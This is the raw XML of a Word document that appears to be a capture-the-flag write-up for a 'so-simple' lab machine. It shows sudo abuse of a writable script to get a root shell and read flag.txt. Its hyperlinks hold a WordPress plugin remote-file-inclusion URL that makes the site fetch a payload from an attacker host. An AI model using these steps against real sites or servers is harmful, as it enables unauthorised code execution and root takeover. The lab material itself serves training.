      <w:r w:rsidR="00E36B33" w:rsidRPr="00104383">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">enter then type </w:t>
      </w:r>
      <w:r w:rsidR="00E36B33"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bash</w:t>
      </w:r>
      <w:r w:rsidR="00E36B33" w:rsidRPr="00104383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E36B33"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AFC9A" wp14:editId="34C38814">
            <wp:extent cx="4844143" cy="5651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5679" cy="5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B8E" w14:textId="698ABDFA" w:rsidR="00E36B33" w:rsidRPr="00104383" w:rsidRDefault="00E36B33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Change permissions of the bash file by using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chmod +x /opt/tools/server-health.sh</w:t>
      </w:r>
      <w:r w:rsidR="00DE6B54"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E6B54"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E14DA0" wp14:editId="23AAC66B">
            <wp:extent cx="4711700" cy="15504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4141" cy="1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0820" w14:textId="2BFA991C" w:rsidR="00DE6B54" w:rsidRPr="00104383" w:rsidRDefault="00967C1E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Use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cd / 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to go back to steven@so-simple home directory </w:t>
      </w:r>
      <w:r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966FF" wp14:editId="38804598">
            <wp:extent cx="2368550" cy="313409"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="55" name="Picture 5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 shot of a computer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96771" cy="3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8630" w14:textId="0DF3CA08" w:rsidR="00967C1E" w:rsidRPr="00104383" w:rsidRDefault="00967C1E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Use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sudo -u root /opt/tools/server-health.sh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to get into the root shell. </w:t>
      </w:r>
      <w:r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9D60D" wp14:editId="38396C12">
            <wp:extent cx="4641850" cy="34764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4274" cy="3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4010" w14:textId="52633C34" w:rsidR="00967C1E" w:rsidRPr="00104383" w:rsidRDefault="00967C1E" w:rsidP="00C44FC2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Use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cd /root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to get into the root’s root directory. </w:t>
      </w:r>
      <w:r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DEF32" wp14:editId="208611BD">
            <wp:extent cx="2330450" cy="382999"/>
            <wp:effectExtent l="0" t="0" r="0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42251" cy="3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CE1" w14:textId="68A530A1" w:rsidR="00532E04" w:rsidRPr="00652196" w:rsidRDefault="00532E04" w:rsidP="00532E0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65219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Capturing the flag, </w:t>
      </w:r>
      <w:r w:rsidRPr="0065219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highlight w:val="yellow"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7ED2B9" w14:textId="397E3AC3" w:rsidR="00967C1E" w:rsidRPr="00104383" w:rsidRDefault="00967C1E" w:rsidP="00967C1E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Use command </w:t>
      </w:r>
      <w:r w:rsidRPr="00104383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to see root’s directories. We see flag.txt.</w:t>
      </w:r>
      <w:r w:rsidR="00AE16DE"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E16DE" w:rsidRPr="0010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28A9F" wp14:editId="3DE8D325">
            <wp:extent cx="1730006" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="58" name="Picture 5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 shot of a computer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8724" cy="4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78CA" w14:textId="580038D3" w:rsidR="00967C1E" w:rsidRPr="00104383" w:rsidRDefault="00AE16DE" w:rsidP="00967C1E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Use command </w:t>
      </w:r>
      <w:r w:rsidRPr="001043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cat flag.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00104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view the file.</w:t>
      </w:r>
      <w:r w:rsidRPr="001043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0438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182238D" wp14:editId="1136BAFE">
            <wp:extent cx="3726873" cy="2268774"/>
            <wp:effectExtent l="0" t="0" r="6985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4702" cy="22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2A48" w14:textId="77777777" w:rsidR="00532E04" w:rsidRPr="00104383" w:rsidRDefault="00532E04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00532E04" w:rsidRPr="00104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4D45"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20F6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8279A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04D4B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CD14A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BBE6F2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B294F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE6AB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D6E2B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78247298"/>
    <w:lvl w:ilvl="0" w:tplc="0409000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1455" w:hanging="360"/>
      </w:p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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="639C30BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3BD24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321C57"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4C8F586"/>
    <w:lvl w:ilvl="0" w:tplc="0409000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1455" w:hanging="360"/>
      </w:p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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="70BE73E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="97006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9646239">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="87703733">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="839928296">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="438985629">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1069037177">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1096291997">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1368676376">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1018310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04"/>
    <w:rsid w:val="00001391"/>
    <w:rsid w:val="00042F39"/>
    <w:rsid w:val="0004327E"/>
    <w:rsid w:val="000E0A7E"/>
    <w:rsid w:val="00104383"/>
    <w:rsid w:val="00105CDD"/>
    <w:rsid w:val="00151F84"/>
    <w:rsid w:val="00195CB9"/>
    <w:rsid w:val="001A479E"/>
    <w:rsid w:val="001C2B87"/>
    <w:rsid w:val="001E0504"/>
    <w:rsid w:val="001F087E"/>
    <w:rsid w:val="00231307"/>
    <w:rsid w:val="002411B3"/>
    <w:rsid w:val="002424C1"/>
    <w:rsid w:val="003E4CE4"/>
    <w:rsid w:val="003E4F07"/>
    <w:rsid w:val="0040211B"/>
    <w:rsid w:val="00407D24"/>
    <w:rsid w:val="004E07F1"/>
    <w:rsid w:val="004E41CF"/>
    <w:rsid w:val="00532E04"/>
    <w:rsid w:val="00595A30"/>
    <w:rsid w:val="00641B6D"/>
    <w:rsid w:val="00652196"/>
    <w:rsid w:val="006D7AB0"/>
    <w:rsid w:val="0076469F"/>
    <w:rsid w:val="007820DA"/>
    <w:rsid w:val="007825E7"/>
    <w:rsid w:val="00790670"/>
    <w:rsid w:val="00790C95"/>
    <w:rsid w:val="007A3815"/>
    <w:rsid w:val="00803C73"/>
    <w:rsid w:val="00837A44"/>
    <w:rsid w:val="008A3940"/>
    <w:rsid w:val="008D2150"/>
    <w:rsid w:val="009131F5"/>
    <w:rsid w:val="009464AC"/>
    <w:rsid w:val="00952CE1"/>
    <w:rsid w:val="00962DB2"/>
    <w:rsid w:val="00967C1E"/>
    <w:rsid w:val="00972173"/>
    <w:rsid w:val="009F4D24"/>
    <w:rsid w:val="009F772F"/>
    <w:rsid w:val="00A57AA9"/>
    <w:rsid w:val="00A95DD6"/>
    <w:rsid w:val="00AE16DE"/>
    <w:rsid w:val="00B23F3A"/>
    <w:rsid w:val="00B77619"/>
    <w:rsid w:val="00B803BB"/>
    <w:rsid w:val="00BA1B7A"/>
    <w:rsid w:val="00C2541F"/>
    <w:rsid w:val="00C44FC2"/>
    <w:rsid w:val="00C50F38"/>
    <w:rsid w:val="00C57184"/>
    <w:rsid w:val="00C711FA"/>
    <w:rsid w:val="00C806BB"/>
    <w:rsid w:val="00C8285B"/>
    <w:rsid w:val="00CA59FF"/>
    <w:rsid w:val="00D72C2C"/>
    <w:rsid w:val="00D8546A"/>
    <w:rsid w:val="00DB3601"/>
    <w:rsid w:val="00DE6B54"/>
    <w:rsid w:val="00E3521B"/>
    <w:rsid w:val="00E36B33"/>
    <w:rsid w:val="00E50189"/>
    <w:rsid w:val="00E92D9A"/>
    <w:rsid w:val="00F12681"/>
    <w:rsid w:val="00F3244F"/>
    <w:rsid w:val="00F804FD"/>
    <w:rsid w:val="00F84569"/>
    <w:rsid w:val="00F934D1"/>
    <w:rsid w:val="00FD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BDD0F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FC6A1301-3CF0-4C29-846D-60D4A4077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2E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32E04"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00532E04"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00532E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77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7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9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://192.168.1.204/wordpress/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://WEBSITE/wp-admin/admin-post.php?swp_debug=load_option&amp;swp_url=http://ATTACKER_HOST/payload.txt" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:max@192.168.1.204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hyperlink" Target="http://192.168.1.204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192.168.1.204/wordpress/wp-admin/admin-post.php?swp_debug=load_option&amp;swp_url=http://192.168.1.153/simple.txt" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:max@192.168.1.204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www.exploit-db.com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://192.168.1.204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14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Musngi, Red David</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rafael D Musngi</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-21T18:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-29T17:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>